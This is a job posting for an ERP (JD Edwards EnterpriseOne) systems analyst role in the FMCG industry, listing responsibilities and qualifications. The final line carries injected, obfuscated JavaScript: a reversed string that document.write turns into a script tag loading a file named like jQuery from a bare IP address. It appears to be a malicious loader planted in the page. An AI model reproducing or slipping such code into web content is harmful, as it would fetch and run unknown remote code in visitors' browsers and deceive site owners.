Industry : FMCG
– Primary responsibility for supporting the business process workflow for use with JDE ERP system. This involves supporting Accounting / Finance, Customer Service, Sales, and Distribution functions including EDI transactions with trading partners.
– Assist in the system implementation and enhancements of JD Edwards (JDE) EnterpriseOne applications.
– Analyze user requirements, prepare requirements document, current state and future state processes and identify gaps
– Manage periodic reviews of current systems and implement continual improvement where appropriate.
– Prepare technical and operational procedures and documentation for the applications including business process flows and user guide, etc.
– Design processes to meet requirements, prepare test plans, conduct testing validation, and support user acceptance testing (UAT)
– Communicate application and project status to users / stakeholders in a timely manner
– Ensure delivered IT solutions meet or exceed customer’s expectations
– Lead troubleshooting and root cause analysis of ERP application issues
– Develop analytical reports and ad-hoc reporting
– Assist with documenting ERP applications, data integration, and support procedures
– Perform other duties as when assigned to support enterprise applications
– Bachelor’s Degree in Information Systems or a related field
– At least 3 – 4 years of working experience in the related field
– Experience supporting JD Edwards EnterpriseOne Financials, Supply Chain and Distribution, Order Management or Inventory applications.
– Experience with JDE reporting tools, creating ad-hoc reports, and writing SQL queries
– Familiar with Software Lifecycle Management (SDLC), Change Management, and agile methodology
– Good problem-solving skills
– Ability to troubleshoot and support day to day end user and system issues
– Must be able to prioritize and handle multiple tasks/projects at one time
– Proactive and good interpersonal skills
– Proficiency with Microsoft Excel and Word
– Excellent customer service skills
– Excellent listening and communication skills
– Ability to interact with personnel at all levels of the company to obtain, analyze, and discuss business processes and solutions
– Ability to communicate ideas in both technical and user-friendly language
– Basic understanding of data structures, business views, system configurations, integration points, and application tools
– Experience with understanding business requirements and collaborating in finding technical solutions.
– Ability to apply analysis and creative thinking when solving problems
– Experience with identifying and implementing process improvements document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))